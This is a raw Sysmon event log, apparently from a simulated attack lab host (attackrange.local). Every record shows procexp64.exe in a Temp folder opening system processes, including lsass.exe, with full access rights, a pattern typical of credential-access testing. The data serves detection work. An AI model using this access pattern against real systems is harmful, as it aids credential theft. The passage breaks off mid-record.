15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788188Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788187Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788186Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788185Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788184Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788183Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788182Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788181Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788180Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788179Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788178Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788301Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788300Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788299Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788298Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788297Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788296Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788295Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788294Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788293Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788292Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788291Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788290Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788289Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788288Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788287Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788286Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788285Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788284Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788283Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788282Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788281Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788280Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788279Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788278Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788277Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788276Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:19.924{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program 